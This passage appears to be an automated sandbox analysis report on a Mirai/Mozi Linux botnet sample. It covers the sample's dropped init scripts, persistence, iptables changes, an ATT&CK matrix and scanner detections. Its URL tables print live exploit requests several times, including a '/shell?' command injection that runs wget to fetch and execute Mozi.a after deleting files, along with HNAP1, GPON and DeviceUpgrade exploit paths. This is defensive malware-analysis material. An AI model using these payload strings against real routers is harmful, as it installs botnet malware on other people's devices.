                Source: /tmp/MGuvcs6Ocz (PID: 4599)File: /etc/init.d/mountall.shJump to dropped file
                Source: /tmp/MGuvcs6Ocz (PID: 4599)File: /etc/init.d/checkfs.shJump to dropped file
                Source: /tmp/MGuvcs6Ocz (PID: 4599)File: /etc/init.d/umountnfs.shJump to dropped file
                Source: /tmp/MGuvcs6Ocz (PID: 4599)File: /etc/init.d/mountkernfs.shJump to dropped file
                Source: /tmp/MGuvcs6Ocz (PID: 4599)File: /etc/init.d/checkroot-bootclean.shJump to dropped file
                Source: /tmp/MGuvcs6Ocz (PID: 4599)File: /etc/init.d/mountnfs-bootclean.shJump to dropped file
                Source: /tmp/MGuvcs6Ocz (PID: 4599)File: /etc/init.d/bootmisc.shJump to dropped file
                Source: /tmp/MGuvcs6Ocz (PID: 4599)File: /etc/init.d/checkroot.shJump to dropped file
                Source: /tmp/MGuvcs6Ocz (PID: 4599)File: /etc/init.d/hwclock.shJump to dropped file
                Source: /tmp/MGuvcs6Ocz (PID: 4599)File: /etc/init.d/hostname.shJump to dropped file
                Source: /tmp/MGuvcs6Ocz (PID: 4599)File: /etc/init.d/mountdevsubfs.shJump to dropped file
                Source: /tmp/MGuvcs6Ocz (PID: 4599)File: /etc/init.d/mountall-bootclean.shJump to dropped file
                Source: /tmp/MGuvcs6Ocz (PID: 4599)File: /etc/init.d/mountnfs.shJump to dropped file
                Source: /tmp/MGuvcs6Ocz (PID: 4599)File: /usr/bin/gettext.shJump to dropped file
                Source: /tmp/MGuvcs6Ocz (PID: 4599)File: /usr/sbin/alsa-info.shJump to dropped file
                Uses known network protocols on non-standard portsShow sources
                Source: unknownNetwork traffic detected: HTTP traffic on port 47166 -> 81
                Source: unknownNetwork traffic detected: HTTP traffic on port 42672 -> 5555
                Source: unknownNetwork traffic detected: HTTP traffic on port 56268 -> 81
                Source: unknownNetwork traffic detected: HTTP traffic on port 81 -> 56268
                Source: unknownNetwork traffic detected: HTTP traffic on port 53656 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 53656 -> 37215
                Source: unknownNetwork traffic detected: HTTP traffic on port 53656 -> 37215
                Source: /tmp/MGuvcs6Ocz (PID: 4582)Queries kernel information via 'uname':
                Source: /tmp/MGuvcs6Ocz (PID: 4599)Queries kernel information via 'uname':
                Source: /tmp/MGuvcs6Ocz (PID: 4622)Queries kernel information via 'uname':
                Source: /sbin/modprobe (PID: 4641)Queries kernel information via 'uname':
                Source: /usr/share/apport/apport-gtk (PID: 4850)Queries kernel information via 'uname':
                Source: /usr/share/apport/apport-gtk (PID: 4877)Queries kernel information via 'uname':
                Source: kvm-test-1-run.sh.8.drBinary or memory string: ( $QEMU $qemu_args -m 512 -kernel $resdir/bzImage -append "$qemu_append $boot_args"; echo $? > $resdir/qemu-retval ) &
                Source: functions.sh0.8.drBinary or memory string: # Usually this will be one of /usr/bin/qemu-system-*
                Source: kvm-test-1-run.sh.8.drBinary or memory string: kill -KILL $qemu_pid
                Source: functions.sh0.8.drBinary or memory string: qemu-system-ppc64)
                Source: kvm-test-1-run.sh.8.drBinary or memory string: echo Monitoring qemu job at pid $qemu_pid
                Source: kvm.sh.8.drBinary or memory string: print "kvm-test-1-run.sh " CONFIGDIR cf[j], builddir, rd cfr[jn], dur " \"" TORTURE_QEMU_ARG "\" \"" TORTURE_BOOTARGS "\" > " rd cfr[jn] "/kvm-test-1-run.sh.out 2>&1 &"
                Source: kvm-test-1-run.sh.8.drBinary or memory string: qemu_pid=$!
                Source: kvm-test-1-run.sh.8.drBinary or memory string: if kill -0 $qemu_pid > /dev/null 2>&1
                Source: functions.sh0.8.drBinary or memory string: # and TORTURE_QEMU_INTERACTIVE environment variables.
                Source: kvm-recheck-lock.sh.8.drBinary or memory string: dur=`sed -e 's/^.* locktorture.shutdown_secs=//' -e 's/ .*$//' < $i/qemu-cmd 2> /dev/null`
                Source: kvm-test-1-run.sh.8.drBinary or memory string: BOOT_IMAGE="`identify_boot_image $QEMU`"
                Source: kvm-test-1-run.sh.8.drBinary or memory string: qemu_args="`specify_qemu_cpus "$QEMU" "$qemu_args" "$cpu_count"`"
                Source: functions.sh0.8.drBinary or memory string: if test -n "$TORTURE_QEMU_INTERACTIVE"
                Source: kvm.sh.8.drBinary or memory string: -v TORTURE_QEMU_ARG="$TORTURE_QEMU_ARG" \
                Source: functions.sh0.8.drBinary or memory string: identify_qemu_append () {
                Source: kvm-test-1-run.sh.8.drBinary or memory string: echo Grace period for qemu job at pid $qemu_pid
                Source: functions.sh0.8.drBinary or memory string: qemu-system-x86_64|qemu-system-i386)
                Source: kvm-test-1-run.sh.8.drBinary or memory string: qemu_args="-enable-kvm -soundhw pcspk -nographic $qemu_args"
                Source: functions.sh0.8.drBinary or memory string: # Returns our best guess as to which qemu command is appropriate for
                Source: kvm.sh.8.drBinary or memory string: TORTURE_QEMU_INTERACTIVE="$TORTURE_QEMU_INTERACTIVE"; export TORTURE_QEMU_INTERACTIVE
                Source: kvm-test-1-run.sh.8.drBinary or memory string: grep "^(qemu) qemu:" $resdir/kvm-test-1-run.sh.out >> $resdir/Warnings 2>&1
                Source: kvm-test-1-run.sh.8.drBinary or memory string: QEMU="`identify_qemu $builddir/vmlinux`"
                Source: functions.sh0.8.drBinary or memory string: # Appends a string containing "-smp XXX" to qemu-args, unless the incoming
                Source: functions.sh0.8.drBinary or memory string: identify_qemu_args () {
                Source: kvm-test-1-run.sh.8.drBinary or memory string: echo "NOTE: $QEMU either did not run or was interactive" > $builddir/console.log
                Source: functions.sh0.8.drBinary or memory string: qemu-system-x86_64|qemu-system-i386)
                Source: kvm-test-1-run.sh.8.drBinary or memory string: qemu_append="`identify_qemu_append "$QEMU"`"
                Source: kvm-test-1-run.sh.8.drBinary or memory string: # Generate -smp qemu argument.
                Source: kvm-test-1-run.sh.8.drBinary or memory string: echo "!!! PID $qemu_pid hung at $kruntime vs. $seconds seconds" >> $resdir/Warnings 2>&1
                Source: functions.sh0.8.drBinary or memory string: elif test -n "$TORTURE_QEMU_INTERACTIVE"
                Source: functions.sh0.8.drBinary or memory string: # Output arguments for the qemu "-append" string based on CPU type
                Source: kvm.sh.8.drBinary or memory string: --qemu-args|--qemu-arg)
                Source: kvm.sh.8.drBinary or memory string: TORTURE_QEMU_CMD="$TORTURE_QEMU_CMD"; export TORTURE_QEMU_CMD
                Source: functions.sh0.8.drBinary or memory string: echo $TORTURE_QEMU_CMD
                Source: kvm.sh.8.drBinary or memory string: TORTURE_QEMU_MAC=$2
                Source: kvm.sh.8.drBinary or memory string: TORTURE_QEMU_INTERACTIVE=1; export TORTURE_QEMU_INTERACTIVE
                Source: kvm-test-1-run.sh.8.drBinary or memory string: killpid="`sed -n "s/^(qemu) qemu: terminating on signal [0-9]* from pid \([0-9]*\).*$/\1/p" $resdir/Warnings`"
                Source: functions.sh0.8.drBinary or memory string: specify_qemu_cpus () {
                Source: kvm-test-1-run.sh.8.drBinary or memory string: vcpus=`identify_qemu_vcpus`
                Source: functions.sh0.8.drBinary or memory string: echo qemu-system-ppc64
                Source: functions.sh0.8.drBinary or memory string: if test -n "$TORTURE_QEMU_INTERACTIVE" -a -n "$TORTURE_QEMU_MAC"
                Source: kvm.sh.8.drBinary or memory string: checkarg --qemu-args "-qemu args" $# "$2" '^-' '^error'
                Source: functions.sh0.8.drBinary or memory string: qemu-system-ppc64)
                Source: functions.sh0.8.drBinary or memory string: # identify_boot_image qemu-cmd
                Source: kvm.sh.8.drBinary or memory string: TORTURE_QEMU_ARG="$2"
                Source: kvm-recheck-rcu.sh.8.drBinary or memory string: dur=`sed -e 's/^.* rcutorture.shutdown_secs=//' -e 's/ .*$//' < $i/qemu-cmd 2> /dev/null`
                Source: functions.sh0.8.drBinary or memory string: # identify_qemu_append qemu-cmd
                Source: functions.sh0.8.drBinary or memory string: identify_qemu_vcpus () {
                Source: functions.sh0.8.drBinary or memory string: # qemu-args already contains "-smp".
                Source: kvm-test-1-run.sh.8.drBinary or memory string: if kill -0 $qemu_pid > /dev/null 2>&1
                Source: functions.sh0.8.drBinary or memory string: # Use TORTURE_QEMU_CMD environment variable or appropriate
                Source: functions.sh0.8.drBinary or memory string: echo Cannot figure out what qemu command to use! 1>&2
                Source: functions.sh0.8.drBinary or memory string: # the kernel at hand. Override with the TORTURE_QEMU_CMD environment variable.
                Source: functions.sh0.8.drBinary or memory string: # identify_qemu_vcpus
                Source: kvm.sh.8.drBinary or memory string: TORTURE_QEMU_CMD="$2"
                Source: functions.sh0.8.drBinary or memory string: # specify_qemu_cpus qemu-cmd qemu-args #cpus
                Source: functions.sh0.8.drBinary or memory string: # identify_qemu_args qemu-cmd serial-file
                Source: functions.sh0.8.drBinary or memory string: if test -n "$TORTURE_QEMU_CMD"
                Source: kvm.sh.8.drBinary or memory string: --qemu-cmd)
                Source: kvm.sh.8.drBinary or memory string: TORTURE_QEMU_MAC="$TORTURE_QEMU_MAC"; export TORTURE_QEMU_MAC
                Source: kvm-test-1-run.sh.8.drBinary or memory string: qemu_args=$5
                Source: kvm-test-1-run.sh.8.drBinary or memory string: echo $QEMU $qemu_args -m 512 -kernel $resdir/bzImage -append \"$qemu_append $boot_args\" > $resdir/qemu-cmd
                Source: kvm-test-1-run.sh.8.drBinary or memory string: qemu_args="$qemu_args `identify_qemu_args "$QEMU" "$builddir/console.log"`"
                Source: kvm-test-1-run.sh.8.drBinary or memory string: # Generate qemu -append arguments
                Source: functions.sh0.8.drBinary or memory string: # identify_qemu builddir
                Source: functions.sh0.8.drBinary or memory string: # and the TORTURE_QEMU_INTERACTIVE environment variable.
                Source: kvm-test-1-run.sh.8.drBinary or memory string: # Generate architecture-specific and interaction-specific qemu arguments
                Source: functions.sh0.8.drBinary or memory string: echo -device spapr-vlan,netdev=net0,mac=$TORTURE_QEMU_MAC
                Source: kvm.sh.8.drBinary or memory string: checkarg --qemu-cmd "(qemu-system-...)" $# "$2" 'qemu-system-' '^--'
                Source: functions.sh0.8.drBinary or memory string: echo qemu-system-i386
                Source: functions.sh0.8.drBinary or memory string: # Output arguments for qemu arguments based on the TORTURE_QEMU_MAC
                Source: functions.sh0.8.drBinary or memory string: echo qemu-system-x86_64
                Source: functions.sh0.8.drBinary or memory string: identify_qemu () {

                Mitre Att&ck Matrix

                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid AccountsCommand and Scripting Interpreter1.bash_profile and .bashrc1.bash_profile and .bashrc1Masquerading1OS Credential Dumping1Security Software Discovery11Remote ServicesData from Local SystemExfiltration Over Other Network MediumNon-Standard Port11Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                Default AccountsScripting12At (Linux)1At (Linux)1File and Directory Permissions Modification1Brute Force1Remote System Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain AccountsAt (Linux)1Logon Script (Windows)Logon Script (Windows)Scripting12Security Account ManagerSystem Network Configuration Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol4Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDSFile and Directory Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol4SIM Card SwapCarrier Billing Fraud
                Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA SecretsSystem Information Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Number of created Files
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 397466 Sample: MGuvcs6Ocz Startdate: 25/04/2021 Architecture: LINUX Score: 100 91 91.57.107.2, 8080 DTAGInternetserviceprovideroperationsDE Germany 2->91 93 49.0.203.86, 8080 YOKOUNANET-MN-AS-APYOKOZUNANETLLCMN Mongolia 2->93 95 103 other IPs or domains 2->95 99 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->99 101 Antivirus detection for dropped file 2->101 103 Antivirus / Scanner detection for submitted sample 2->103 105 7 other signatures 2->105 12 MGuvcs6Ocz 2->12         started        14 upstart sh 2->14         started        16 upstart sh 2->16         started        18 upstart sh 2->18         started        signatures3 process4 process5 20 MGuvcs6Ocz 12->20         started        22 sh date 14->22         started        24 sh apport-checkreports 14->24         started        26 sh date 16->26         started        28 sh apport-gtk 16->28         started        30 sh date 18->30         started        32 sh apport-gtk 18->32         started        process6 34 MGuvcs6Ocz 20->34         started        file7 83 /usr/sbin/alsa-info.sh, ASCII 34->83 dropped 85 /usr/networks, ELF 34->85 dropped 87 /usr/bin/gettext.sh, ASCII 34->87 dropped 89 21 other malicious files 34->89 dropped 107 Sample tries to persist itself using /etc/profile 34->107 109 Drops files in suspicious directories 34->109 111 Sample reads /proc/mounts (often used for finding a writable filesystem) 34->111 113 Sample tries to persist itself using System V runlevels 34->113 38 MGuvcs6Ocz 34->38         started        41 MGuvcs6Ocz sh 34->41         started        43 MGuvcs6Ocz sh 34->43         started        45 30 other processes 34->45 signatures8 process9 signatures10 119 Opens /proc/net/* files useful for finding connected devices and routers 38->119 47 MGuvcs6Ocz sh 38->47         started        49 MGuvcs6Ocz sh 38->49         started        51 MGuvcs6Ocz sh 38->51         started        62 5 other processes 38->62 53 sh killall 41->53         started        56 sh iptables 43->56         started        58 sh iptables 45->58         started        60 sh iptables 45->60         started        64 21 other processes 45->64 process11 signatures12 66 sh iptables 47->66         started        69 sh iptables 49->69         started        71 sh iptables 51->71         started        115 Terminates several processes with shell command 'killall' 53->115 117 Executes the "iptables" command to insert, remove and/or manipulate rules 56->117 73 sh iptables 62->73         started        75 sh iptables 62->75         started        77 sh iptables 62->77         started        79 2 other processes 62->79 process13 signatures14 97 Executes the "iptables" command to insert, remove and/or manipulate rules 66->97 81 iptables modprobe 66->81         started        process15

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                MGuvcs6Ocz68%VirustotalBrowse
                MGuvcs6Ocz54%MetadefenderBrowse
                MGuvcs6Ocz69%ReversingLabsLinux.Trojan.Mirai
                MGuvcs6Ocz100%AviraLINUX/Mirai.lldau

                Dropped Files

                SourceDetectionScannerLabelLink
                /usr/networks100%AviraLINUX/Mirai.lldau
                /usr/networks54%MetadefenderBrowse
                /usr/networks69%ReversingLabsLinux.Trojan.Mirai

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://pastebin.ca)0%Avira URL Cloudsafe
                http://%s:%d/bin.sh;chmod0%Avira URL Cloudsafe
                http://%s:%d/Mozi.a;chmod0%Avira URL Cloudsafe
                http://146.158.12.4:80/HNAP1/0%Avira URL Cloudsafe
                http://%s:%d/Mozi.m;$0%Avira URL Cloudsafe
                http://168.184.43.22:37215/ctrlt/DeviceUpgrade_10%Avira URL Cloudsafe
                http://217.182.243.67:80/HNAP1/0%Avira URL Cloudsafe
                http://%s:%d/Mozi.m0%Avira URL Cloudsafe
                http://www.alsa-project.org/cardinfo-db/0%Avira URL Cloudsafe
                http://99.192.234.217:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws0%Avira URL Cloudsafe
                http://166.88.243.237:80/HNAP1/0%Avira URL Cloudsafe
                http://13.226.101.83:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws0%Avira URL Cloudsafe
                http://%s:%d/bin.sh0%Avira URL Cloudsafe
                http://154.201.250.66:80/HNAP1/0%Avira URL Cloudsafe
                http://www.alsa-project.org/alsa-info.sh0%Avira URL Cloudsafe
                http://%s:%d/Mozi.m;0%Avira URL Cloudsafe
                http://133.137.248.191:80/HNAP1/0%Avira URL Cloudsafe
                http://%s:%d/Mozi.a;sh$0%Avira URL Cloudsafe
                http://157.245.223.131:80/HNAP1/0%Avira URL Cloudsafe
                http://18.228.54.139:80/HNAP1/0%Avira URL Cloudsafe
                http://81.7.8.12:80/HNAP1/0%Avira URL Cloudsafe
                http://35.244.243.215:80/HNAP1/0%Avira URL Cloudsafe
                http://127.0.0.1:80/GponForm/diag_Form?images/0%Avira URL Cloudsafe
                http://45.65.120.55:80/HNAP1/0%Avira URL Cloudsafe
                http://127.0.0.1:8080/GponForm/diag_Form?images/0%Avira URL Cloudsafe
                http://127.0.0.10%Avira URL Cloudsafe
                http://127.0.0.1:5555/UD/act?10%Avira URL Cloudsafe
                http://www.alsa-project.org0%Avira URL Cloudsafe
                http://23.217.112.105:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws0%Avira URL Cloudsafe
                http://127.0.0.1sendcmd0%Avira URL Cloudsafe
                http://23.40.37.31:80/HNAP1/0%Avira URL Cloudsafe
                http://%s:%d/Mozi.m;/tmp/Mozi.m0%Avira URL Cloudsafe
                http://purenetworks.com/HNAP1/0%Avira URL Cloudsafe
                http://185.29.123.11:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws0%Avira URL Cloudsafe
                http://www.alsa-project.org.0%Avira URL Cloudsafe
                http://HTTP/1.10%Avira URL Cloudsafe
                http://23.76.236.93:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws0%Avira URL Cloudsafe
                http://154.90.79.101:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws0%Avira URL Cloudsafe
                http://79.171.18.106:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws0%Avira URL Cloudsafe
                http://23.207.67.88:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                dht.transmissionbt.com
                87.98.162.88
                truefalse
                  high
                  bttracker.acc.umu.se
                  130.239.18.159
                  truefalse
                    high
                    router.bittorrent.com
                    67.215.246.10
                    truefalse
                      high
                      router.utorrent.com
                      82.221.103.244
                      truefalse
                        high
                        bttracker.debian.org
                        unknown
                        unknownfalse
                          high

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          http://146.158.12.4:80/HNAP1/true
                          • Avira URL Cloud: safe
                          unknown
                          http://168.184.43.22:37215/ctrlt/DeviceUpgrade_1false
                          • Avira URL Cloud: safe
                          unknown
                          http://217.182.243.67:80/HNAP1/true
                          • Avira URL Cloud: safe
                          unknown
                          http://99.192.234.217:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jawstrue
                          • Avira URL Cloud: safe
                          unknown
                          http://166.88.243.237:80/HNAP1/true
                          • Avira URL Cloud: safe
                          unknown
                          http://13.226.101.83:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jawstrue
                          • Avira URL Cloud: safe
                          unknown
                          http://154.201.250.66:80/HNAP1/true
                          • Avira URL Cloud: safe
                          unknown
                          http://133.137.248.191:80/HNAP1/true
                          • Avira URL Cloud: safe
                          unknown
                          http://157.245.223.131:80/HNAP1/true
                          • Avira URL Cloud: safe
                          unknown
                          http://18.228.54.139:80/HNAP1/true
                          • Avira URL Cloud: safe
                          unknown
                          http://81.7.8.12:80/HNAP1/true
                          • Avira URL Cloud: safe
                          unknown
                          http://35.244.243.215:80/HNAP1/false
                          • Avira URL Cloud: safe
                          unknown
                          http://127.0.0.1:80/GponForm/diag_Form?images/true
                          • Avira URL Cloud: safe
                          unknown
                          http://45.65.120.55:80/HNAP1/true
                          • Avira URL Cloud: safe
                          unknown
                          http://127.0.0.1:8080/GponForm/diag_Form?images/true
                          • Avira URL Cloud: safe
                          unknown
                          http://127.0.0.1:5555/UD/act?1true
                          • Avira URL Cloud: safe
                          unknown
                          http://23.217.112.105:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jawstrue
                          • Avira URL Cloud: safe
                          unknown
                          http://23.40.37.31:80/HNAP1/true
                          • Avira URL Cloud: safe
                          unknown
                          http://185.29.123.11:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jawstrue
                          • Avira URL Cloud: safe
                          unknown
                          http://23.76.236.93:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jawstrue
                          • Avira URL Cloud: safe
                          unknown
                          http://154.90.79.101:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jawstrue
                          • Avira URL Cloud: safe
                          unknown
                          http://79.171.18.106:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jawstrue
                          • Avira URL Cloud: safe
                          unknown
                          http://23.207.67.88:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jawstrue
                          • Avira URL Cloud: safe
                          unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          http://pastebin.ca)alsa-info.sh0.8.drfalse
                          • Avira URL Cloud: safe
                          low
                          http://%s:%d/bin.sh;chmodMGuvcs6Ocztrue
                          • Avira URL Cloud: safe
                          low
                          http://%s:%d/Mozi.a;chmodMGuvcs6Oczfalse
                          • Avira URL Cloud: safe
                          low
                          http://%s:%d/Mozi.m;$MGuvcs6Oczfalse
                          • Avira URL Cloud: safe
                          low
                          http://schemas.xmlsoap.org/soap/envelope/MGuvcs6Oczfalse
                            high
                            http://www.pastebin.ca/upload.phpalsa-info.sh0.8.drfalse
                              high
                              http://%s:%d/Mozi.mMGuvcs6Oczfalse
                              • Avira URL Cloud: safe
                              low
                              http://www.alsa-project.org/cardinfo-db/alsa-info.sh0.8.drfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEYalsa-info.sh0.8.drfalse
                                high
                                http://%s:%d/bin.shMGuvcs6Ocztrue
                                • Avira URL Cloud: safe
                                low
                                http://www.alsa-project.org/alsa-info.shalsa-info.sh0.8.drfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://%s:%d/Mozi.m;MGuvcs6Oczfalse
                                • Avira URL Cloud: safe
                                low
                                http://%s:%d/Mozi.a;sh$MGuvcs6Oczfalse
                                • Avira URL Cloud: safe
                                low
                                http://www.pastebin.ca.alsa-info.sh0.8.drfalse
                                  high
                                  http://schemas.xmlsoap.org/soap/encoding/MGuvcs6Oczfalse
                                    high
                                    http://127.0.0.1MGuvcs6Oczfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://baidu.com/%s/%s/%d/%s/%s/%s/%s)MGuvcs6Oczfalse
                                      high
                                      http://ia.51.la/go1?id=17675125&pu=http%3a%2f%2fv.baidu.com/.config.8.drfalse
                                        high
                                        http://www.alsa-project.orgalsa-info.sh0.8.drfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://127.0.0.1sendcmdMGuvcs6Oczfalse
                                        • Avira URL Cloud: safe
                                        low
                                        http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY&encrypt=t&encryptpw=blahblahalsa-info.sh0.8.drfalse
                                          high
                                          http://ipinfo.io/ipMGuvcs6Oczfalse
                                            high
                                            http://%s:%d/Mozi.m;/tmp/Mozi.mMGuvcs6Oczfalse
                                            • Avira URL Cloud: safe
                                            low
                                            http://www.pastebin.caalsa-info.sh0.8.drfalse
                                              high
                                              http://purenetworks.com/HNAP1/MGuvcs6Oczfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.alsa-project.org.alsa-info.sh0.8.drfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://HTTP/1.1MGuvcs6Oczfalse
                                              • Avira URL Cloud: safe
                                              low
                                              http://schemas.xmlsoap.org/soap/envelope//MGuvcs6Oczfalse
                                                high

                                                Contacted IPs

                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs

                                                Public

                                                IPDomainCountryFlagASNASN NameMalicious
                                                179.67.135.130
                                                unknownBrazil
                                                7738TelemarNorteLesteSABRfalse
                                                219.215.91.164
                                                unknownJapan17676GIGAINFRASoftbankBBCorpJPfalse
                                                81.165.231.66
                                                unknownBelgium
                                                6848TELENET-ASBEfalse
                                                113.189.251.248
                                                unknownViet Nam
                                                45899VNPT-AS-VNVNPTCorpVNfalse
                                                141.33.224.95
                                                unknownGermany
                                                680DFNVereinzurFoerderungeinesDeutschenForschungsnetzesefalse
                                                33.59.152.55
                                                unknownUnited States
                                                2686ATGS-MMD-ASUSfalse
                                                131.194.232.220
                                                unknownUnited States
                                                19342TRINITY-UNIVERSITYUSfalse
                                                177.97.224.43
                                                unknownBrazil
                                                18881TELEFONICABRASILSABRfalse
                                                105.23.11.84
                                                unknownMauritius
                                                37100SEACOM-ASMUfalse
                                                50.18.249.52
                                                unknownUnited States
                                                16509AMAZON-02USfalse
                                                9.119.216.229
                                                unknownUnited States
                                                3356LEVEL3USfalse
                                                98.117.217.106
                                                unknownUnited States
                                                701UUNETUSfalse
                                                181.82.14.167
                                                unknownArgentina
                                                7303TelecomArgentinaSAARfalse
                                                37.218.12.173
                                                unknownSpain
                                                12338EUSKALTELESfalse
                                                167.116.31.50
                                                unknownUruguay
                                                6057AdministracionNacionaldeTelecomunicacionesUYfalse
                                                174.166.171.113
                                                unknownUnited States
                                                7922COMCAST-7922USfalse
                                                175.59.180.182
                                                unknownChina
                                                134810CMNET-JILIN-AS-APChinaMobileGroupJiLincommunicationscofalse
                                                20.219.183.3
                                                unknownUnited States
                                                8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                115.145.240.169
                                                unknownKorea Republic of
                                                9686SKKUNET-ASSungKyunKwanUniversitySKKUKRfalse
                                                129.61.62.75
                                                unknownUnited States
                                                385AFCONC-BLOCK1-ASUSfalse
                                                31.246.254.22
                                                unknownGermany
                                                3320DTAGInternetserviceprovideroperationsDEfalse
                                                44.179.175.67
                                                unknownUnited States
                                                7377UCSDUSfalse
                                                91.57.107.2
                                                unknownGermany
                                                3320DTAGInternetserviceprovideroperationsDEtrue
                                                135.235.118.101
                                                unknownUnited States
                                                10455LUCENT-CIOUSfalse
                                                31.135.20.186
                                                unknownPoland
                                                56983SWIDMAN-ASPLfalse
                                                129.13.128.214
                                                unknownGermany
                                                34878KITKarlsruheInstituteofTechnologyDEfalse
                                                4.147.62.142
                                                unknownUnited States
                                                3356LEVEL3USfalse
                                                117.196.107.209
                                                unknownIndia
                                                9829BSNL-NIBNationalInternetBackboneINfalse
                                                85.140.136.230
                                                unknownRussian Federation
                                                8359MTSRUfalse
                                                165.81.92.196
                                                unknownUnited States
                                                37053RSAWEB-ASZAfalse
                                                194.174.210.204
                                                unknownGermany
                                                702UUNETUSfalse
                                                181.100.16.154
                                                unknownArgentina
                                                7303TelecomArgentinaSAARfalse
                                                31.167.14.125
                                                unknownSaudi Arabia
                                                35819MOBILY-ASEtihadEtisalatCompanyMobilySAfalse
                                                169.208.248.210
                                                unknownKorea Republic of
                                                37611AfrihostZAfalse
                                                120.98.233.8
                                                unknownTaiwan; Republic of China (ROC)
                                                17716NTU-TWNationalTaiwanUniversityTWfalse
                                                44.9.1.20
                                                unknownUnited States
                                                7377UCSDUSfalse
                                                187.212.113.5
                                                unknownMexico
                                                8151UninetSAdeCVMXfalse
                                                189.52.247.3
                                                unknownBrazil
                                                4230CLAROSABRfalse
                                                126.76.20.8
                                                unknownJapan17676GIGAINFRASoftbankBBCorpJPfalse
                                                117.213.41.118
                                                unknownIndia
                                                9829BSNL-NIBNationalInternetBackboneINfalse
                                                58.189.27.210
                                                unknownJapan17511OPTAGEOPTAGEIncJPfalse
                                                114.36.89.87
                                                unknownTaiwan; Republic of China (ROC)
                                                3462HINETDataCommunicationBusinessGroupTWfalse
                                                211.169.167.142
                                                unknownKorea Republic of
                                                3786LGDACOMLGDACOMCorporationKRfalse
                                                221.34.98.191
                                                unknownJapan17676GIGAINFRASoftbankBBCorpJPfalse
                                                217.211.238.79
                                                unknownSweden
                                                3301TELIANET-SWEDENTeliaCompanySEfalse
                                                101.197.152.207
                                                unknownChina
                                                55992QIHOOBeijingQihuTechnologyCompanyLimitedCNfalse
                                                85.65.154.68
                                                unknownIsrael
                                                1680NV-ASNCELLCOMltdILfalse
                                                181.20.57.55
                                                unknownArgentina
                                                22927TelefonicadeArgentinaARfalse
                                                172.92.207.39
                                                unknownUnited States
                                                54858AS-SBIUSfalse
                                                134.125.107.194
